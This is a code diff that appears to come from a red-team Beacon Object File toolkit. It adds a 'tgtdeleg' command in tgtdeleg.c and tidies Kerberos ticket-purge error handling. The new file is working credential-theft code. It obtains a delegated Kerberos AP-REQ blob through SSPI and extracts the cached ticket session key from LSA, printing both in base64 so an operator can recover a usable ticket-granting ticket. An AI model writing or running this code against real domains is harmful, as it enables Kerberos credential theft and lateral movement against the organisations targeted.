42		-	SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &purgeRequest, sizeof(KERB_PURGE_TKT_CACHE_REQUEST),
43		-	&purgeResponse, &responseSize, &protocolStatus);
	41	+	status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &purgeRequest,
	42	+	sizeof(KERB_PURGE_TKT_CACHE_REQUEST), &purgeResponse, &responseSize, &protocolStatus);
44	43
45		-	if (!NT_SUCCESS(status) \|\| !NT_SUCCESS(protocolStatus)) {
46		-	PRINT(dispatch, "[!] LsaCallAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
47		-	PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus %ld\n",
48		-	ADVAPI32$LsaNtStatusToWinError(protocolStatus));
	44	+	if (NT_SUCCESS(status)) {
	45	+	if (NT_SUCCESS(protocolStatus)) {
	46	+	PRINT(dispatch, "[+] Successfully purged tickets.\n");
	47	+	} else {
	48	+	PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus %ld\n",
	49	+	ADVAPI32$LsaNtStatusToWinError(protocolStatus));
	50	+	}
49	51		} else {
50		-	PRINT(dispatch, "[+] Successfully purged tickets.\n");
	52	+	PRINT(dispatch, "[!] LsaCallAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
51	53		}
52	54
53	55		SECUR32$LsaDeregisterLogonProcess(hLsa);
		skipped 1 lines

■ ■ ■ ■ ■ ■

source/sessions.c

		skipped 14 lines
15	15		for (int i = 0; i < sessionData.sessionCount; i++) {
16	16		data = sessionData.sessionData[i];
17	17		if (data != NULL) {
18		-	// PRINT(dispatch, "[%d] Session %d %x:0x%x %s\\%s %s:%s\n",
19		-	// i, data->Session, data->LogonId.HighPart, data->LogonId.LowPart,
20		-	// GetNarrowString(data->LogonDomain.Buffer),
21		-	// GetNarrowString(data->UserName.Buffer),
22		-	// GetNarrowString(data->AuthenticationPackage.Buffer),
23		-	// GetLogonTypeString(data->LogonType));
24	18		PrintLogonSessionData(dispatch, *data);
25	19		if (i != sessionData.sessionCount - 1) {
26	20		PRINT(dispatch, "\n\n");
		skipped 115 lines

■ ■ ■ ■ ■ ■

source/tgtdeleg.c

1	+	#include "tgtdeleg.h"
2	+
3	+	void execute_tgtdeleg(WCHAR** dispatch, char* spn) {
4	+	CredHandle hCred;
5	+	TimeStamp timeStamp;
6	+	SECURITY_STATUS status = SECUR32$AcquireCredentialsHandleA(NULL, "Kerberos", SECPKG_CRED_OUTBOUND, NULL, NULL, 0,
7	+	NULL, &hCred, &timeStamp);
8	+	if (status == SEC_E_OK) {
9	+	CtxtHandle hCtx;
10	+	SecBuffer secBuf = {0, SECBUFFER_TOKEN, NULL};
11	+	SecBufferDesc secBufDesc = {SECBUFFER_VERSION, 1, &secBuf};
12	+	ULONG contextAttr;
13	+	status = SECUR32$InitializeSecurityContextA(
14	+	&hCred, NULL, (SEC_CHAR*)spn, ISC_REQ_ALLOCATE_MEMORY \| ISC_REQ_DELEGATE \| ISC_REQ_MUTUAL_AUTH, 0,
15	+	SECURITY_NATIVE_DREP, NULL, 0, &hCtx, &secBufDesc, &contextAttr, NULL);
16	+	if (status == SEC_E_OK \|\| status == SEC_I_CONTINUE_NEEDED) {
17	+	if (contextAttr & ISC_REQ_DELEGATE) {
18	+	int b64len = Base64encode_len(secBuf.cbBuffer);
19	+	char* encoded = MSVCRT$calloc(b64len, sizeof(char));
20	+	if (encoded == NULL) {
21	+	PRINT(dispatch, "[!] Could not allocate memory.\n");
22	+	goto out;
23	+	}
24	+	Base64encode(encoded, secBuf.pvBuffer, secBuf.cbBuffer);
25	+	PRINT(dispatch, "[+] AP-REQ blob: %s\n", encoded);
26	+	MSVCRT$free(encoded);
27	+	if (secBuf.pvBuffer) {
28	+	SECUR32$FreeContextBuffer(secBuf.pvBuffer);
29	+	}
30	+	SECUR32$DeleteSecurityContext(&hCtx);
31	+	} else {
32	+	PRINT(dispatch, "[!] Client is not allowed to delegate to target.\n");
33	+	}
34	+	} else {
35	+	PRINT(dispatch, "[!] InitializeSecurityContext: 0x%lx\n", status);
36	+	}
37	+	out:
38	+	SECUR32$FreeCredentialsHandle(&hCred);
39	+	} else {
40	+	PRINT(dispatch, "[!] AcquireCredentialsHandle: 0x%lx\n", status);
41	+	}
42	+	}
43	+
44	+	void execute_tgtdeleg_getkey(WCHAR** dispatch, HANDLE hToken, char* target, LONG encType) {
45	+	HANDLE hLsa;
46	+	NTSTATUS status = GetLsaHandle(hToken, FALSE, &hLsa);
47	+	if (!NT_SUCCESS(status)) {
48	+	PRINT(dispatch, "[!] GetLsaHandle %ld\n", status);
49	+	return;
50	+	}
51	+	ULONG authPackage;
52	+	LSA_STRING krbAuth = {.Buffer = "kerberos", .Length = 8, .MaximumLength = 9};
53	+	status = SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage);
54	+	if (!NT_SUCCESS(status)) {
55	+	PRINT(dispatch, "[!] LsaLookupAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
56	+	goto out;
57	+	}
58	+	WCHAR* wTarget = GetWideString(target);
59	+	if (wTarget == NULL) {
60	+	PRINT(dispatch, "[!] Could not allocate memory.\n");
61	+	goto out;
62	+	}
63	+	USHORT dwTarget = (MSVCRT$wcslen(wTarget) + 1) * sizeof(WCHAR);
64	+	ULONG requestSize = dwTarget + sizeof(KERB_RETRIEVE_TKT_REQUEST);
65	+	PKERB_RETRIEVE_TKT_REQUEST request =
66	+	(PKERB_RETRIEVE_TKT_REQUEST)MSVCRT$calloc(requestSize, sizeof(KERB_RETRIEVE_TKT_REQUEST));
67	+	if (request == NULL) {
68	+	PRINT(dispatch, "[!] Could not allocate memory.\n");
69	+	goto out;
70	+	}
71	+	request->MessageType = KerbRetrieveEncodedTicketMessage;
72	+	request->CacheOptions = KERB_RETRIEVE_TICKET_USE_CACHE_ONLY;
73	+	request->EncryptionType = encType;
74	+	request->TargetName.Length = dwTarget - sizeof(WCHAR);
75	+	request->TargetName.MaximumLength = dwTarget;
76	+	request->TargetName.Buffer = (PWSTR)((PBYTE)request + sizeof(KERB_RETRIEVE_TKT_REQUEST));
77	+	MSVCRT$memcpy(request->TargetName.Buffer, wTarget, request->TargetName.MaximumLength);
78	+	PKERB_RETRIEVE_TKT_RESPONSE response;
79	+	NTSTATUS protocolStatus;
80	+	status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, request, requestSize, &response, &requestSize,
81	+	&protocolStatus);
82	+	MSVCRT$free(request);
83	+	MSVCRT$free(wTarget);
84	+	if (NT_SUCCESS(status)) {
85	+	if (NT_SUCCESS(protocolStatus)) {
86	+	if (requestSize > 0) {
87	+	int len = Base64encode_len(response->Ticket.SessionKey.Length);
88	+	char* encoded = (char*)MSVCRT$calloc(len, sizeof(char));
89	+	if (encoded != NULL) {
90	+	Base64encode(encoded, response->Ticket.SessionKey.Value, response->Ticket.SessionKey.Length);
91	+	PRINT(dispatch, "[+] Session key: %s\n", encoded);
92	+	MSVCRT$free(encoded);
93	+	} else {
94	+	PRINT(dispatch, "[!] Could not allocate memory.\n");
95	+	}
96	+	SECUR32$LsaFreeReturnBuffer(&response);
97	+	} else {
98	+	PRINT(dispatch, "[!] Empty response.\n");
99	+	}
100	+	} else {
101	+	PRINT(dispatch, "[!] LsaCallAuthenticationPackage protocol status: %ld\n",
102	+	ADVAPI32$LsaNtStatusToWinError(protocolStatus));
103	+	}
104	+	} else {
105	+	PRINT(dispatch, "[!] LsaCallAuthenticationPackage status: %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
106	+	}
107	+
108	+	out:
109	+	SECUR32$LsaDeregisterLogonProcess(hLsa);
110	+	return;
111	+	}
112	+

Add tgtdeleg command